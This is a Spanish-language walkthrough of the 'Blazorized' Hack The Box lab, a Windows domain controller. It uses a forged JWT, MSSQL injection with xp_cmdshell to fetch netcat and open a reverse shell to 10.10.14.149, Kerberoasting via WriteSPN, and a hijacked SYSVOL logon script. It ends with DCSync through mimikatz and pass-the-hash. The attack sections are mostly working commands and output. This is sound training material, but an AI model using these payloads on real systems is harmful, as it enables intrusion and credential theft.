Blazorized

OS: Windows
Dificultad: Difícil
Puntos: 40

Nmap

ports=$(nmap -p- --min-rate=5000 -T4 10.129.216.24 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p $ports -sC -sV 10.129.216.24
Nmap scan report for 10.129.216.24
Host is up (0.15s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-title: Did not follow redirect to http://blazorized.htb
|_http-server-header: Microsoft-IIS/10.0
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-07-02 10:00:35Z)
135/tcp   open  msrpc         Microsoft Windows RPC                                                                                                                                               
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                                                       
445/tcp   open  microsoft-ds?                                                                                                                                                                     
464/tcp   open  kpasswd5?                                                                                                                                                                         
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0                                                                                                                                 
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1115.00; RC0+                                                                                                                       
| ms-sql-ntlm-info:                                                                                                                                                                               
|   10.129.216.24\BLAZORIZED:                                                                                                                                                                     
|     Target_Name: BLAZORIZED                                                                                                                                                                     
|     NetBIOS_Domain_Name: BLAZORIZED                                                                                                                                                             
|     NetBIOS_Computer_Name: DC1                                                                                                                                                                  
|     DNS_Domain_Name: blazorized.htb                                                                                                                                                             
|     DNS_Computer_Name: DC1.blazorized.htb                                                                                                                                                       
|     DNS_Tree_Name: blazorized.htb                                                                                                                                                               
|_    Product_Version: 10.0.17763                                                                                                                                                                 
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback                                                                                                                                          
| Not valid before: 2024-07-02T07:39:38                                                                                                                                                           
|_Not valid after:  2054-07-02T07:39:38                                                                                                                                                           
| ms-sql-info:                                                                                                                                                                                    
|   10.129.216.24\BLAZORIZED:                                                                                                                                                                     
|     Instance name: BLAZORIZED                                                                                                                                                                   
|     Version:                                                                                                                                                                                    
|       name: Microsoft SQL Server 2022 RC0+                                                                                                                                                      
|       number: 16.00.1115.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RC0
|       Post-SP patches applied: true
|     TCP port: 1433
|_    Clustered: false
|_ssl-date: 2024-07-02T10:01:42+00:00; 0s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49671/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49774/tcp open  msrpc         Microsoft Windows RPC
49776/tcp open  ms-sql-s      Microsoft SQL Server 2022 16.00.1115.00; RC0+
| ms-sql-info: 
|   10.129.216.24:49776: 
|     Version: 
|       name: Microsoft SQL Server 2022 RC0+
|       number: 16.00.1115.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RC0
|       Post-SP patches applied: true
|_    TCP port: 49776
| ms-sql-ntlm-info: 
|   10.129.216.24:49776: 
|     Target_Name: BLAZORIZED
|     NetBIOS_Domain_Name: BLAZORIZED
|     NetBIOS_Computer_Name: DC1
|     DNS_Domain_Name: blazorized.htb
|     DNS_Computer_Name: DC1.blazorized.htb
|     DNS_Tree_Name: blazorized.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2024-07-02T10:01:42+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-07-02T07:39:38
|_Not valid after:  2054-07-02T07:39:38
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

Descubrimos subdominios.

ffuf -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.blazorized.htb" -u http://blazorized.htb -fw 9
admin                   [Status: 200, Size: 2047, Words: 149, Lines: 28, Duration: 155ms]

Si capturamos la request descubrimos otro subdomain.

http://blazorized.htb/check-updates
api.blazorized.htb

La aplicacion utiliza blazor vemos la carpeta _framework en el debugger.

Si accedemos a la URL http://blazorized.htb/_framework/ en Burp encontramos varias llamadas a DLLs y archivos.

curl http://blazorized.htb/_framework/blazor.boot.json -o blazor.boot.json
"lazyAssembly": {
      "Blazorized.Helpers.dll": "sha256-ekLzpGbbVEn95uwSU2BGWpjosCK\/fqqQRjGFUW0jAQQ="
    }

Descargamos las DLL.

curl http://blazorized.htb/_framework/Blazorized.Helpers.dll -o Blazorized.Helpers.dll

Decompile DLL

Utilizando dotPeek podemos decompiliar el dll y vemos el siguiente contenido.

    private const long EXPIRATION_DURATION_IN_SECONDS = 60;
    private static readonly string jwtSymmetricSecurityKey = "8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a";
    private static readonly string superAdminEmailClaimValue = "superadmin@blazorized.htb";
    private static readonly string postsPermissionsClaimValue = "Posts_Get_All";
    private static readonly string categoriesPermissionsClaimValue = "Categories_Get_All";
    private static readonly string superAdminRoleClaimValue = "Super_Admin";
    private static readonly string issuer = "http://api.blazorized.htb";
    private static readonly string apiAudience = "http://api.blazorized.htb";
    private static readonly string adminDashboardAudience = "http://admin.blazorized.htb";

Con eso podemos generar nuestro propio token.

Ponemos el token en local storage y accedemos al panel de admin.

eyJhbGciOiJIUzUxMiIsInR5cCI6IkpXVCJ9.eyJodHRwOi8vc2NoZW1hcy54bWxzb2FwLm9yZy93cy8yMDA1LzA1L2lkZW50aXR5L2NsYWltcy9lbWFpbGFkZHJlc3MiOiJzdXBlcmFkbWluQGJsYXpvcml6ZWQuaHRiIiwiaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93cy8yMDA4LzA2L2lkZW50aXR5L2NsYWltcy9yb2xlIjpbIlN1cGVyX0FkbWluIiwiUG9zdHNfR2V0X0FsbCIsIkNhdGVnb3JpZXNfR2V0X0FsbCJdLCJleHAiOjE5MTk5MTkzMzIsImlzcyI6Imh0dHA6Ly9hcGkuYmxhem9yaXplZC5odGIiLCJhdWQiOiJodHRwOi8vYWRtaW4uYmxhem9yaXplZC5odGIiLCJpYXQiOjE3MTk5MTk5MjB9.1_mtVuDdMhdI193SFKLZI-ch8YpRg1PUYDUtSSGiQbf76MwI8cbCRvVgri_sJ97fN1t3lIBLVQXB1yP1N3WBzQ

SQL Injection (MSSQL)

En el siguiente url identificamos que es vulnerable a sql injection, ya que esta montado en un MSSQL podemos obtener RCE de la siguiente forma.

http://admin.blazorized.htb/check-duplicate-post-title
'; exec xp_cmdshell 'mkdir c:\temp'-- -
'; exec xp_cmdshell 'curl 10.10.14.149/nc64.exe -o c:\temp\nc.exe'-- -
'; exec xp_cmdshell 'c:\temp\nc.exe 10.10.14.149 1234 -e cmd.exe'-- -

Obtenemos una reverse shell.

Lateral Movement

Utilizamos SharpHound para recolectar informacion sobre el dominio.

curl 10.10.14.149/SharpHound.exe -o SharpHound.exe
c:\Temp>SharpHound.exe -c all
SharpHound.exe -c all
2024-07-02T18:42:53.3184630-05:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-07-02T18:42:53.5528595-05:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-07-02T18:42:53.5841063-05:00|INFORMATION|Initializing SharpHound at 6:42 PM on 7/2/2024
2024-07-02T18:42:53.7872048-05:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for blazorized.htb : DC1.blazorized.htb
2024-07-02T18:42:53.9122095-05:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-07-02T18:42:54.0998193-05:00|INFORMATION|Beginning LDAP search for blazorized.htb
2024-07-02T18:42:54.1467094-05:00|INFORMATION|Producer has finished, closing LDAP channel
2024-07-02T18:42:54.1467094-05:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-07-02T18:43:24.7091439-05:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-07-02T18:43:36.1778228-05:00|INFORMATION|Consumers finished, closing output channel
2024-07-02T18:43:36.2246966-05:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-07-02T18:43:36.3340799-05:00|INFORMATION|Status: 110 objects finished (+110 2.619048)/s -- Using 44 MB RAM
2024-07-02T18:43:36.3340799-05:00|INFORMATION|Enumeration finished in 00:00:42.2309311
2024-07-02T18:43:36.4278399-05:00|INFORMATION|Saving cache with stats: 70 ID to type mappings.
 72 name to SID mappings.
 0 machine sid mappings.
 2 sid to domain mappings.
 0 global catalog mappings.
2024-07-02T18:43:36.4434589-05:00|INFORMATION|SharpHound Enumeration Completed at 6:43 PM on 7/2/2024! Happy Graphing!

Copiamos el archivo a nuestra maquina.

# Windows
nc -w 5 10.10.14.149 4444 < 20240702184335_BloodHound.zip

# Kali
nc -lvnp 4444 > 20240702184335_BloodHound.zip

Revisando el contenido con bloodhound vemos que el usuario tiene permisos WriteSPN en el usuario RSA_4810.

WriteSPN Abuse

Utilizando PowerView.ps1 podemos obtener un hash para despues romperlo. Usamos los siguiente comandos.

curl 10.10.14.149/PowerView.ps1 -o PowerView.ps1
powershell
import-module .\PowerView.ps1

Obtenemos el hash kerberos.

Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='doom/test'}
Get-DomainSPNTicket -SPN doom/test
SamAccountName       : UNKNOWN
DistinguishedName    : UNKNOWN
ServicePrincipalName : doom/test
TicketByteHexStream  : 
Hash                 : $krb5tgs$23$*UNKNOWN$UNKNOWN$doom/test*$473C8B85BCEE4B39D280913E0B95DFC1$750DCA6E3A7715AE5E7B2CC
                       BD10F1BF2FBA1B69ED4EE768FD786B17BCC3A5E9CD0DA6F1DC97A0D5C35786B664867F52E883B2A0A96F8515ED3B1EA0
                       88E654D2C20F42A3DD44B6BF8C69F54047A0851FF9DB7AC94B9C54E5ABCDEDED422EB485CF7AB9AA832F56F17833F2F5
                       FD22B1607EF46BF26257BC80B688F38F819F958FD1896172CD00BAC04FC76AE52014FDAEED7BDE428A250E77EA994C0F
                       F59E3E41282DFDB9A07C71BDE8C49A982F7135D3C71F00B60B2D6026017734E37E957A9427A42233D39CE39AEA0DA33B
                       4C225C9D8A5FA680ECC02EEBE97C1B3D824CCE9C9612492A7344D19AA01FD45A5E1A30CE342C0B3E07AC207770B73415
                       C3BF2F80824A031B34B15B57D05599864149D8273DBC05B86859964542A9C8CA049198A00F2F54151252BF9597B86D43
                       42B08E09DDB4D63B7B20E8F0518C1751568F645A58B48FACEAF30F7DC75E1F3D74E0A81BD62B58B849546FC4CA257293
                       1D95240F13378B74452BE36ED1BC53041920CF067A1FBDE897F689865FEF4521BF600414BC5042C38D8D2C058E42AE9A
                       2BAFA1008BBE6B31B96A41EBB75A7BD143380589AAC517D82851CC2195EFA7F1228BDA922B74CB8E5324D1571D264F73
                       A364A64F9376B959BCE314909B109D78C2C51958B73E365E50969A2E1067E332F0F585899EB747A2AF16360BF117A9A0
                       E2ADC9720737C36935FF1F6F697D029E5F7988D1124B9D39B7BC73E92E5D1039C3DA475BDCD94E4D50BAFDCBA11A6603
                       00E9974432BC6E626C54F9FE763FD164929ED278E11C3EB47EB72A2FEDEBFEEF0166C7093649B6D3493FEAB3750E4721
                       01E81EC6C8DE160A80EA839F6108868CCB6718898690911A8B0B5A3C2793F44C4141BF08103825AA55156098D4A96CA3
                       ADC2C125A065F769F97F0A081331EDCA9AD14F6D4016331A1FF64D1C8A1C082832DE364E584B04F45FC07D299ED5488E
                       4F8B5A24A0A12BB8C1F0077D34E51F67685690F2F7CD6B8AEEDC7C8526E5C83167379B9FEB322C122F35D427760C6260
                       22CA2C0BA57560A2DD18249F51C2EEEEE5B50DBC59204232BA153E551937C8BAA2F257B6B9FC524E49AD8B09566A1DDA
                       EA24CE712F9D33F8F1D82A3B96935FED5DCAB6024FB4C9FA5751070B7281FFBFB66DA46D3168A5FC407F8515C95E08E6
                       2866A2ABCB1D40A3544DB850CD55F5F9FE80B9B81DA04256FE505FE6D6B6E295C3008978F38398F204F236624FCB5F9F
                       7B0DF8CAB459A4D658B9F2F938C1D52F8ADD511B6F5436063C78265FC6B238EC25CFB245A101B85CB89FBCFE8943EEB6
                       9C32B2D78A32B021068E26F0CAEE31E12CDF389C3067C535073182712E2E1B09F6984F9B95C824E904DFF21CF0339EB8
                       1EC1FB8C702D5C8693A038E5FB78C1738927886AEBA7E1EC801CE1F8E3C77E77F8738F2A086F909113090D8709E75CC5
                       1892B9173DE42952D8F5AEBA839ED963CAF0E62B70BEF8C92981DB090F856861F9309A9007F7F6B9A7F60AB756D142EC
                       A21CB08E4190665B7BE0FE0B9804A693ADC2B639AC2B819B6DF8854467305DFB3538036049EC721CC24839AF3CC76D8F
                       375AF1E009858CAA7F3796E2DAAB6F19B852961B8B11C72FF815C6A37446F74DBA0BAA5838878C094F28648354DDF75C
                       0411586B2C81DBE0BA122F565A3D44B7728EF97C33471E262AE7E65A087B2BCA973D975B4198B6B4DE39FBF3FA5515C6
                       2EB08868652B63D5852454599DE6DD132165E351850171E97F00CA646583BDD2711D12E42E67E4D86B922F899

Crackeamos el hash.

┌──(root㉿kali)-[~/htb/Box/Blazorized]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
(Ni7856Do9854Ki05Ng0005 #) (?)     
1g 0:00:00:21 DONE (2024-07-02 20:00) 0.04739g/s 678654p/s 678654c/s 678654C/s (alejo)..(Camisha)
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

Con estas credenciales podemos conectarmos por winrm.

┌──(root㉿kali)-[~/htb/Box/Blazorized]
└─# evil-winrm -i blazorized.htb -u RSA_4810 -p '(Ni7856Do9854Ki05Ng0005 #)'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\RSA_4810\Documents>

Privilege Escalation

Ejecutando winpeas vemos que el usuario tiene privilegios de escritura en las siguiente ruta.

    Folder: C:\windows\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]
   =================================================================================================


    Folder: C:\windows\system32\tasks
    FolderPerms: Authenticated Users [WriteData/CreateFiles]

El usario tiene permisos de escritura en el siguiente path.

*Evil-WinRM* PS C:\windows\SYSVOL\sysvol\blazorized.htb\scripts> icacls A32FF3AEAA23
A32FF3AEAA23 BLAZORIZED\RSA_4810:(OI)(CI)(RX,W)
             NT AUTHORITY\Authenticated Users:(I)(RX)
             NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(GR,GE)
             BUILTIN\Server Operators:(I)(RX)
             BUILTIN\Server Operators:(I)(OI)(CI)(IO)(GR,GE)
             BUILTIN\Administrators:(I)(F)
             BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
             NT AUTHORITY\SYSTEM:(I)(F)
             NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
             CREATOR OWNER:(I)(OI)(CI)(IO)(F)

Tenemos privilegios de escritura en el directorio A32FF3AEAA23 en SYSVOL, que se usa comúnmente para scripts de inicio de sesión y datos de políticas de grupo.

El usuario SSA_6010 inicia sesión cada minuto

SSA_6010 también ejecuta un script de inicio de sesión desde el atributo scriptpath \dc1\NETLOGON\A32FF3AEAA23\B00AC3C11C0E\BAEDDDCD2BCB\C0B3ACE33AEF\2C0A3DFE2030, lo que indica que los scripts de inicio de sesión están almacenados en NETLOGON Share

Creamos un script de inicio de sesión para obtener un reverse shell.

'c:\temp\nc.exe 10.10.14.149 4444 -e cmd.exe'| Out-File -FilePath C:\windows\SYSVOL\sysvol\blazorized.htb\scripts\A32FF3AEAA23\doom.bat -Encoding ASCII
Set-ADUser -Identity SSA_6010 -ScriptPath 'A32FF3AEAA23\doom.bat'

Este usuario tiene permitido DCSync con esto escalaremos privilegios. Usamos mimikatz para extrar el hash NTLM del usuario Administrador.

lsadump::dcsync /domain:blazorized.htb /user:Administrator

Nos conectamos con ese hash por winrm.

┌──(root㉿kali)-[~/htb/Box/Blazorized]
└─# evil-winrm -i blazorized.htb -u Administrator -H f55ed1465179ba374ec1cad05b34a5f3
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>